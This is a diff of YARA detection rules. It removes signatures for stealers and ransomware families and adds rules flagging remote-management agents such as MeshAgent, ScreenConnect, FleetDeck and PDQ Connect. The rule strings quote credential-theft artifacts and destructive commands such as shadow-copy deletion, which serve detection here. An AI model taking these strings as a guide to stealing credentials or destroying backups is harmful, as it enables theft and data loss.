-		$s3 = ".?AVfilesystem_error@v1@filesystem@experimental@std@@" fullword ascii
-		$s4 = "CredEnumerateW" fullword ascii
-		$s5 = "%[^:]://%[^/]%[^" fullword ascii
-		$s6 = "%99[^:]://%99[^/]%99[^" fullword ascii
-		$s7 = "Login Data" wide
-		$s8 = "m_it.object_iterator != m_object->m_value.object->end()" fullword wide
-		$x1 = "endptr == token_buffer.data() + token_buffer.size()" fullword wide
-		$x2 = "\\json.hpp" wide
-		$x3 = "Microsoft_WinInet_" fullword wide
-		$x4 = "Microsoft_WinInet_*" fullword wide
+		$x1 = "\\MeshAgent" wide
+		$x2 = "Mesh Agent" wide
+		$x3 = "MeshDummy" wide
+		$x4 = "MeshCentral" wide
+		$x5 = "ILibRemoteLogging.c" ascii
+		$x6 = "AgentCore/MeshServer_" wide
+		$s1 = "var _tmp = 'Detected OS: ' + require('os').Name;" ascii
+		$s2 = "console.log(getSHA384FileHash(process.execPath).toString('hex'))" ascii
+		$s3 = "ScriptContainer.Create(): Error spawning child process, using [%s]" fullword ascii
+		$s4 = "{\"agent\":\"" ascii
+		$s6 = "process.versions.commitHash" fullword ascii
+		$s7 = "console.log('Error Initializing script from Zip file');process._exit();" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 3 of ( $x* ) and 2 of ( $s* ) ) or ( 4 of ( $s* ) and 1 of ( $x* ) ) )
+		uint16( 0 ) == 0x5a4d and ( 3 of ( $x* ) or ( 1 of ( $x* ) and 3 of ( $s* ) ) or 6 of ( $s* ) )
 }
-rule DITEKSHEN_MALWARE_Win_Tefosteal : FILE
+
+rule DITEKSHEN_INDICATOR_RMM_Meshagent_CERT : FILE
 {
 	meta:
-		description = "Tefosteal payload"
+		description = "Detects Mesh Agent by (default) certificate. Review RMM Inventory"
 		author = "ditekSHen"
-		id = "56646933-3ed3-5b77-9135-993b57603490"
-		date = "2024-11-01"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L653-L674"
+		id = "b4b52faa-53a5-5ecf-bff8-984994449ee0"
+		date = "2024-10-04"
+		modified = "2024-10-04"
+		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L29-L42"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a350863270cbe3349f271e55d66a2ebdd6406e8d122c11071de74a774eb77ebf"
+		logic_hash = "d8ac3aec723a87146be99aefbde5642d095d8d41f69c6f5e9981c39104790d33"
 		score = 75
-		quality = 71
+		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Trojan.Tefosteal"
-
-	strings:
-		$s1 = "netsh wlan show networks mode=bssid" nocase fullword wide
-		$s2 = "LoginCredentialService.GetLoginCredentials$" ascii
-		$s3 = "DefaultLoginCredentials.LoginEventUsrPw$" ascii
-		$s4 = "SEC_E_NO_KERB_KEY" wide
-		$s5 = "TList<System.Zip.TZipHeader>." ascii
-		$s6 = "_Password.txt" fullword wide nocase
-		$s7 = "_Cookies.txt" fullword wide nocase
-		$f1 = "\\InfoPC\\BSSID.txt" wide
-		$f2 = "\\Files\\Telegram\\" wide
-		$f3 = "\\InfoPC\\Screenshot.png" wide
-		$f4 = "\\InfoPC\\Systeminfo.txt" wide
-		$f5 = "\\Steam\\config" wide
-		$f6 = "\\delete.vbs" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of ( $s* ) and 2 of ( $f* )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . issuer contains "MeshCentralRoot-" )
 }
-rule DITEKSHEN_MALWARE_Win_Cryptostealergo : FILE
+rule DITEKSHEN_INDICATOR_RMM_Connectwise_Screenconnect : FILE
 {
 	meta:
-		description = "CryptoStealerGo payload"
+		description = "Detects ConnectWise Control (formerly ScreenConnect). Review RMM Inventory"
 		author = "ditekSHen"
-		id = "83886aeb-af7e-564c-989a-fb7d955814e2"
-		date = "2024-11-01"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L676-L692"
+		id = "d752b7e4-b595-56cb-97f1-a60e73160e5a"
+		date = "2024-10-04"
+		modified = "2024-10-04"
+		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L62-L83"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0050be7522e7d89cb9688e63fdca11d24baa74aa858e8c19ee7b4658518536b6"
+		logic_hash = "43003f97c33c631a2806ce2b82b2367d2452ceb21b0267b5dfe78b350b66924a"
 		score = 75
 		quality = 75
 		tags = "FILE"
+		clamav1 = "INDICATOR.Win.RMM.ConnectWise-ScreenConnect"
 
 	strings:
-		$s1 = "Go build ID: \"" ascii
-		$s2 = "file_upload.go" ascii
-		$s3 = "grequests.FileUpload" ascii
-		$s4 = "runtime.newproc" ascii
-		$s5 = "credit_cards" ascii
-		$s6 = "zip.(*fileWriter).Write" ascii
-		$s7 = "autofill_" ascii
-		$s8 = "XFxVc2VyIERhdGFcXA==" ascii
-		$s9 = "XFxBcHBEYXRhXFxMb2NhbFxc" ascii
+		$s1 = "FILESYSCREENCONNECT.CORE, VERSION=" wide
+		$s2 = "feedback.screenconnect.com/Feedback.axd" wide
+		$s3 = /ScreenConnect (Software|Client)/ wide
+		$s4 = "ScreenConnect.InstallerActions!ScreenConnect." wide
+		$s5 = "\\\\.\\Pipe\\TerminalServer\\SystemExecSrvr\\" wide
+		$s6 = "\\jmorgan\\Source\\cwcontrol\\Custom\\DotNetRunner\\" wide
+		$s7 = "ScreenConnect." ascii
+		$s8 = "\\ScreenConnect.Core.pdb" ascii
+		$s9 = "relay.screenconnect.com" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 8 of them
+		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0xcfd0 ) and 3 of them
 }
-rule DITEKSHEN_MALWARE_Win_M00Nd3V : FILE
+
+rule DITEKSHEN_INDICATOR_RMM_Connectwise_Screenconnect_CERT : FILE
 {
 	meta:
-		description = "M00nD3v keylogger payload"
+		description = "Detects ConnectWise Control (formerly ScreenConnect) by (default) certificate. Review RMM Inventory"
 		author = "ditekSHen"
-		id = "4000f55d-e072-50b6-b6ee-72cefc0ec53f"
-		date = "2024-11-01"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L694-L715"
+		id = "7a032c24-8a9e-51c3-983e-62e13594aa35"
+		date = "2024-10-04"
+		modified = "2024-10-04"
+		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L85-L99"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "68a0888da3b114dc895fe18a3d03b2b88d140fbf82b888f7a031b9364d01aabf"
+		logic_hash = "14291bd9ddb7fd3ee7932f8104687aae58fe7f5de13726153e5e1ee9c211f598"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
-	strings:
-		$s1 = "M00nD3v Stub" ascii wide
-		$s2 = "M00nD3v{0}{1} Logs{0}{2} \\ {3}{0}{0}{4}" fullword wide
-		$s3 = "Anti-Keylogger Elite" wide
-		$s4 = "/C TASKKILL /F /IM" wide
-		$s5 = "echo.>{0}:Zone.Identifier" fullword wide
-		$s6 = "> Nul & Del \"{0}\" & start \"\" \"{1}.exe\"" wide
-		$s7 = "> Nul & start \"\" \"{1}.exe\"" wide
-		$s8 = "Stealer" fullword wide
-		$s9 = "{0}{0}++++++++++++{1} {2}++++++++++++{0}{0}" wide
-		$s10 = "{4}Application: {3}{4}URL: {0}{4}Username: {1}{4}Password: {2}{4}" wide
-		$s11 = "encrypted_key\":\"(?<Key>.+?)\"" wide
-		$s12 = "Botkiller" fullword ascii
-		$s13 = "AVKiller" fullword ascii
-		$s14 = "get_pnlPawns" fullword ascii
-
 	condition:
-		( uint16( 0 ) == 0x5a4d and 6 of them ) or ( 9 of them )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . issuer contains "DigiCert" and pe.signatures [ i ] . subject contains "Connectwise, LLC" )
 }
-rule DITEKSHEN_MALWARE_Win_Vssdestroy : FILE
+rule DITEKSHEN_INDICATOR_RMM_Fleetdeck_Agent : FILE
 {
 	meta:
-		description = "VSSDestroy/Matrix ransomware payload"
+		description = "Detects FleetDeck Agent. Review RMM Inventory"
 		author = "ditekSHen"
-		id = "734ece56-b993-5b44-ae15-f673fabfe8ad"
-		date = "2024-11-01"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L717-L740"
+		id = "342a196c-1c5c-5951-85e4-d288311b4980"
+		date = "2024-10-04"
+		modified = "2024-10-04"
+		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L101-L123"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "24bfd32580f784440252d629a7ab86b84a570ded34409940616be2a89bf73088"
+		logic_hash = "121e59ea0088c519b618e740b57c560d60cced4a48c9d468e6bf1ab22fa8c8ff"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		snort_sid = "920008-920009"
-		clamav_sig = "MALWARE.Win.Ransomware.VSSDestroy"
+		clamav1 = "INDICATOR.Win.RMM.FleetDeckAgent"
 
 	strings:
-		$o1 = "[SHARESSCAN]" wide
-		$o2 = "[LDRIVESSCAN]" wide
-		$o3 = "[LOGSAVED]" wide
-		$o4 = "[LPROGRESS]" wide
-		$o5 = "[FINISHSAVED]" wide
-		$o6 = "[ALL_LOCAL_KID]" wide
-		$o7 = "[DIRSCAN" wide
-		$o8 = "[GENKEY]" wide
-		$s1 = "\\cmd.exe" nocase wide
-		$s2 = "/C powershell \"" nocase wide
-		$s3 = "%COMPUTERNAME%" wide
-		$s4 = "%USERNAME%" wide
-		$s5 = "Error loading Socket interface (ws2_32.dll)!" wide
-		$s6 = "Old file list dump found. Want to load it? (y/n):" fullword wide
+		$s1 = "fleetdeck.io/" ascii
+		$s2 = "load FleetDeck agent" ascii
+		$s3 = ".dev1.fleetdeck.io" ascii
+		$s4 = "remoteDesktopSessionMutex" ascii
+		$s5 = "main.remoteDesktopWatchdog" fullword ascii
+		$s6 = "main.virtualTerminalWatchdog" fullword ascii
+		$s7 = "main.meetRemoteDesktop" fullword ascii
+		$s8 = "repo.senri.se/prototype3/" ascii
+		$s9 = "main.svcIpcClient" fullword ascii
+		$s10 = "main.hookMqttLogging" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and 4 of ( $o* ) and 3 of ( $s* ) ) or ( 5 of ( $o* ) and 4 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-rule DITEKSHEN_MALWARE_Win_Goldenaxe : FILE
+rule DITEKSHEN_INDICATOR_RMM_Fleetdeck_Commander : FILE
 {
 	meta:
-		description = "GoldenAxe ransomware payload"
+		description = "Detects FleetDeck Commander. Review RMM Inventory"
 		author = "ditekSHen"
-		id = "23874106-dbbb-5cb2-b61a-1661d8e2d868"
-		date = "2024-11-01"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L742-L763"
+		id = "27d533b5-7a66-507e-8ef8-ad9a6cd39ab1"
+		date = "2024-10-04"
+		modified = "2024-10-04"
+		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L125-L143"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "6dfd88ce65acdfed4749e3b817b317c3c514ea42f892a7f5f95853c148507918"
+		logic_hash = "feee888c6649af0d8e8b08a38dda0bf7970089cf064f58b8bd9c6ebd8378e094"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Ransomware.GoldenAxe"
+		clamav1 = "INDICATOR.Win.RMM.FleetDeckCommander"
 
 	strings:
-		$s1 = "Go build ID: " ascii
-		$s2 = "taskkill.exe" ascii
-		$s3 = "cmd.exe" ascii
-		$s4 = "Speak.Speak" ascii
-		$s5 = "CLNTSRVRnull" ascii
-		$s6 = "-----END" ascii
-		$s7 = "-----BEGIN" ascii
-		$s8 = ".EncryptFile" ascii
-		$g1 = "GoldenAxe/Utils." ascii
-		$g2 = "GoldenAxe/Cryptography." ascii
-		$g3 = "GoldenAxe/Walker." ascii
-		$g4 = "C:/Users/alpha/go/src/GoldenAxe/" ascii
-		$g5 = "'Golden Axe ransomware'" ascii
+		$s1 = "Software\\Microsoft\\FleetDeck Commander" ascii
+		$s2 = "fleetdeck.io/prototype3/" ascii
+		$s3 = "fleetdeck_commander_launcher.exe" ascii
+		$s4 = "fleetdeck_commander_svc.exe" ascii
+		$s5 = "|FleetDeck Commander" ascii
+		$s6 = "c:\\agent\\_work\\66\\s\\" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or ( 1 of ( $g* ) and 1 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-rule DITEKSHEN_MALWARE_Win_Robbinhood : FILE
+rule DITEKSHEN_INDICATOR_RMM_Fleetdeck_Commander_SVC : FILE
 {
 	meta:
-		description = "Robbinhood ransomware payload"
+		description = "Detects FleetDeck Commander SVC. Review RMM Inventory"
 		author = "ditekSHen"
-		id = "a5066a22-3c87-5e9f-a94f-5a44af2f96fd"
-		date = "2024-11-01"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L765-L787"
+		id = "c03b61b4-36d0-5d38-9af8-e78b9930231f"
+		date = "2024-10-04"
+		modified = "2024-10-04"
+		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L145-L162"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f1c4226ed5cb1583418d5ef0efc2c2b5bc3cfe7f148f359c5d432fd660331a46"
+		logic_hash = "20bd69df3d058c24f83af312671cf249a3f26f54ef2e60f6b5b48a5bdb21b68b"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Ransomware.Robbinhood"
+		clamav1 = "INDICATOR.Win.RMM.FleetDeckCommander-SVC"
 
 	strings:
-		$go = "Go build ID:" ascii
-		$cmd1 = "cmd.exe /c" ascii
-		$cmd2 = "net use * /DELETE" nocase ascii
-		$cmd3 = "sc.exe stop" ascii
-		$cmd4 = "vssadmin resize shadowstorage" nocase ascii
-		$s1 = /Skipping\s(file|dir)/ ascii
-		$s2 = "Encrypt[ERR] GET Size:" ascii
-		$s3 = ".taskkilltasklistunknown(" ascii
-		$s4 = ".sysvssadmin.exewevtutil.exe MB released" ascii
-		$s5 = ".sysvssadmin.exewevtutil.exewinlogin.exewinlogon.exe MB released" ascii
-		$s6 = ".enc_robbinhood" ascii
-		$s7 = "c:\\windows\\temp\\pub.key" nocase ascii
-		$s8 = "main.CoolMaker" ascii
-		$s9 = "/valery/go/src/oldboy/" ascii
+		$s1 = "fleetdeckfork/execfuncargs(" ascii
+		$s2 = "REG ADD HKEY_CLASSES_ROOT\\%s /V \"URL Protocol\" /T REG_SZ /F" ascii
+		$s3 = "proceed: *.fleetdeck.io" ascii
+		$s4 = "fleetdeck.io/prototype3/commander_svc" ascii
+		$s5 = "commanderupdate.fleetdeck.io" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( $go and 1 of ( $cmd* ) and 3 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-rule DITEKSHEN_MALWARE_Win_Getcrypt : FILE
+rule DITEKSHEN_INDICATOR_RMM_Fleetdeck_Commander_Launcher : FILE
 {
 	meta:
-		description = "GetCrypt ransomware payload"
+		description = "Detects FleetDeck Commander Launcher. Review RMM Inventory"
 		author = "ditekSHen"
-		id = "fb6db807-372f-59e6-96c6-54dd4ece336d"
-		date = "2024-11-01"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L789-L825"
+		id = "9a4a221e-7a7a-5008-b509-7f01e4a3eea6"
+		date = "2024-10-04"
+		modified = "2024-10-04"
+		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L164-L178"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "fd7ee98757c3ac1f2b2a4dd9041c78d33273d7a7d596c3d99c6b8d79988f29f1"
+		logic_hash = "9429f55f162eebc58a7a9af8706244438cb76b1f0987facbb52d29997ed48b95"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-		clamav_sig1 = "MALWARE_Win.Ransomware.GetCrypt-1"
-		clamav_sig2 = "MALWARE_Win.Ransomware.GetCrypt-2"
+		clamav1 = "INDICATOR.Win.RMM.FleetDeckCommander-Launcher"
 
 	strings:
-		$x1 = "delete shadows /all /quiet" wide
-		$x2 = "C:\\Windows\\System32\\svchost.exe" fullword wide
-		$x3 = "desk.bmp" fullword wide
-		$x4 = ":\\Boot" fullword wide
-		$x5 = "\\encrypted_key.bin" fullword wide
-		$x6 = "vssadmin.exe" fullword wide
-		$x7 = ":\\Recovery" fullword wide
-		$s1 = "CryptEncrypt" fullword ascii
-		$s2 = "NtWow64ReadVirtualMemory64" fullword ascii
-		$s3 = "MPR.dll" fullword ascii
-		$s4 = "%key%" fullword ascii
-		$s5 = "CryptDestroyKey" fullword ascii
-		$s6 = "ntdll.dll" fullword ascii
-		$s7 = "WNetCancelConnection2W" fullword ascii
-		$s8 = ".%c%c%c%c" fullword wide
-		$s10 = { 43 72 79 70 74 49 6d 70 6f 72 74 4b 65 79 00 00
-                 cb 00 43 72 79 70 74 45 6e 63 72 79 70 74 00 00
-                 c1 00 43 72 79 70 74 41 63 71 75 69 72 65 43 6f
-                 6e 74 65 78 74 41 00 00 c8 00 43 72 79 70 74 44
-                 65 73 74 72 6f 79 4b 65 79 00 d2 00 43 72 79 70
-                 74 47 65 6e 52 61 6e 64 6f 6d 00 00 c2 00 43 72
-                 79 70 74 41 63 71 75 69 72 65 43 6f 6e 74 65 78
-                 74 57 00 00 41 44 56 41 50 49 33 32 2e 64 6c 6c
-                 00 00 b5 01 53 68 65 6c 6c 45 78 65 63 75 74 65
-                 45 78 57 00 53 48 45 4c 4c 33 32 2e 64 6c 6c 00 }
+		$s1 = "fleetdeck.io/prototype3/commander_launcher" ascii
+		$s2 = "FleetDeck Commander Launcher" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 3 of ( $x* ) or 8 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule DITEKSHEN_MALWARE_Joego : FILE
+
+rule DITEKSHEN_INDICATOR_RMM_Fleetdeck_CERT : FILE
 {
 	meta:
-		description = "JoeGo ransomware payload"
+		description = "Detects FleetDeck agent by (default) certificate. Review RMM Inventory"
 		author = "ditekSHen"
-		id = "23d38bcd-e66d-5ff1-ad6a-3e6432d83562"
-		date = "2024-11-01"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L827-L847"
+		id = "49a6b0bb-599a-54b0-85bc-b2f6849e3ae8"
+		date = "2024-10-04"
+		modified = "2024-10-04"
+		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L180-L198"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "3ddf3506aefb3cd1845f9daa689848a02a2422ca98c5c984bc918cc7ea2b2677"
+		logic_hash = "8f72713eb4a5d9d32629351b937eee7de5d83abe1cd409cd8c3a8c9c52e6e490"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Ransomware.JoeGo"
-
-	strings:
-		$go = "Go build ID:" ascii
-		$s1 = "%SystemRoot%\\system32\\%v." ascii
-		$s2 = "REG ADD HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V" ascii
-		$s3 = "/t REG_SZ /F /D %userprofile%\\" ascii
-		$s4 = "(sensitive) [recovered]" ascii
-		$s5 = "/dev/stderr/dev/stdout/index.html" ascii
-		$s6 = "%userprofile%\\SystemApps" ascii
-		$s7 = "p=<br>ACDTACSTAEDTAESTAKDTAKSTAWSTA" ascii
-		$cnc1 = "/detail.php" ascii
-		$cnc2 = "/checkin.php" ascii
-		$cnc3 = "/platebni_brana.php" ascii
-		$cnc4 = "://nebezpecnyweb.eu/" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and $go and ( all of ( $s* ) or ( 3 of ( $s* ) and 1 of ( $cnc* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( ( pe.signatures [ i ] . issuer contains "Sectigo Limited" or pe.signatures [ i ] . issuer contains "COMODO CA Limited" ) and pe.signatures [ i ] . subject contains "FleetDeck Inc" )
 }
-rule DITEKSHEN_MALWARE_Win_Aurora : FILE
+rule DITEKSHEN_INDICATOR_RMM_Pdqconnect_Agent : FILE
 {
 	meta:
-		description = "Aurora ransomware payload"
+		description = "Detects PDQ Connect Agent. Review RMM Inventory"
 		author = "ditekSHen"
-		id = "d3eafe9c-c8d9-5744-ba5d-4eb0249cceea"
-		date = "2024-11-01"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L849-L869"
+		id = "067e75a3-291b-500f-865d-8758eebe91e7"
+		date = "2024-10-04"
+		modified = "2024-10-04"
+		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L200-L227"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "056bb11e8b947ef90462503db82b2001e4a5d4847fad9c0d5d771384a80d779a"
+		logic_hash = "34d0b07925551d1b08b86aa226c59aba569b6548cfa00a86ce6b1f271e427662"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "Software\\Microsoft\\Windows\\CurrentVersion\\Run" fullword ascii wide
-		$s2 = "#DECRYPT_MY_FILES#.txt" fullword ascii
-		$s3 = "/gen.php?generate=" fullword ascii
-		$s4 = "geoplugin.net/php.gp" ascii
-		$s5 = "/end.php?id=" fullword ascii
-		$s6 = "wotreplay" fullword ascii
-		$s7 = "moneywell" fullword ascii
-		$s8 = "{btc}" fullword ascii
-		$s9 = ".?AV_Locimp@locale@std@@" ascii
-		$s10 = ".?AV?$codecvt@DDU_Mbstatet@@@std@@" ascii
-		$s11 = ".?AU_Crt_new_delete@std@@" ascii
-		$pdb1 = "\\z0ddak\\Desktop\\source\\Release\\Ransom.pdb" ascii
-		$pdb2 = "\\Desktop\\source\\Release\\Ransom.pdb" ascii
+		$api1 = "/devices/register" ascii
+		$api2 = "/devices/socket/websocket?device_id=" ascii
+		$api3 = "/devices/tasks" ascii
+		$api4 = "/devices/auth-challenge" ascii
+		$api5 = "/devices/receiver/Url" ascii
+		$s1 = "sign_pdq.rs" ascii
+		$s2 = "x-pdq-dateCredential=(.+?)/" ascii
+		$s3 = "pdq-connect-agent" ascii
+		$s4 = "PDQ Connect Agent" ascii
+		$s5 = "PDQConnectAgent" ascii
+		$s6 = "PDQConnectAgentsrc\\logger.rs" ascii
+		$s7 = "-PDQ-Key-IdsUser-Agent" ascii
+		$s8 = "\\PDQ\\PDQConnectAgent\\" ascii
+		$s9 = "\\pdq_connect_agent.pdb" ascii
+		$s10 = "task_ids[]PDQ rover" ascii
+		$s11 = "https://app.pdq.com/" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $pdb* ) and 5 of ( $s* ) ) or ( 8 of them ) )
+		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0xcfd0 ) and ( 4 of ( $s* ) or ( 3 of ( $api* ) and 1 of ( $s* ) ) )
 }
-rule DITEKSHEN_MALWARE_Win_Buran : FILE
+
+rule DITEKSHEN_INDICATOR_RMM_Pdqconnect_Agent_CERT : FILE
 {
 	meta:
-		description = "Buran ransomware payload"
+		description = "Detects PDQ Connect Agent by (default) certificate. Review RMM Inventory"
 		author = "ditekSHen"
-		id = "1433bac5-2ece-54bb-8e57-b5834fffc719"
-		date = "2024-11-01"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L871-L903"
+		id = "7e830cf0-8f47-5b38-85cd-9777a6878cf1"
+		date = "2024-10-04"
+		modified = "2024-10-04"
+		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L229-L243"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "eaf50d824dbade0ca63fafc5b4a376553039de9b51a0f6387cb28c8f91a7e0b9"
+		logic_hash = "373a32b8bfd8c4295ba0c0302a217ccfbb7c7c616f91035097adbc5384b8afdb"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Ransomware.Buran"
-
-	strings:
-		$v1_1 = "U?$error_info_injector@V" ascii
-		$v1_2 = "Browse for Folder (FTP)" fullword ascii
-		$v1_3 = "Find/Replace in Files" fullword ascii
-		$v1_4 = "PAHKLM" fullword ascii
-		$v1_5 = "PAHKCR" fullword ascii
-		$v1_6 = "chkOpt_" ascii
-		$h1 = "Search <a href=\"location\" class=\"menu\">in this folder</a>" ascii
-		$h2 = "<br>to find where the text below" ascii
-		$h3 = "</a> files with these extensions (separate with semi-colons)" ascii
-		$h4 = "Need help with <a href=\"" ascii
-		$path = "\\work\\cr\\nata\\libs\\boost_" wide
-		$v2_1 = "(ShlObj" fullword ascii
-		$v2_2 = "\\StreamUnit" fullword ascii
-		$v2_3 = "TReadme" fullword ascii
-		$v2_4 = "TDrivesAndShares" fullword ascii
-		$v2_5 = "TCustomMemoryStreamD" fullword ascii
-		$v2_6 = "OpenProcessToken" fullword ascii
-		$v2_7 = "UrlMon" fullword ascii
-		$v2_8 = "HttpSendRequestA" fullword ascii
-		$v2_9 = "InternetConnectA" fullword ascii
-		$v2_10 = "FindFiles" fullword ascii
-		$v2_12 = "$*@@@*$@@@$" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( ( all of ( $v1* ) and 1 of ( $h* ) ) or ( $path and 2 of ( $v1* ) and 1 of ( $h* ) ) or 10 of them ) or all of ( $v2* ) )
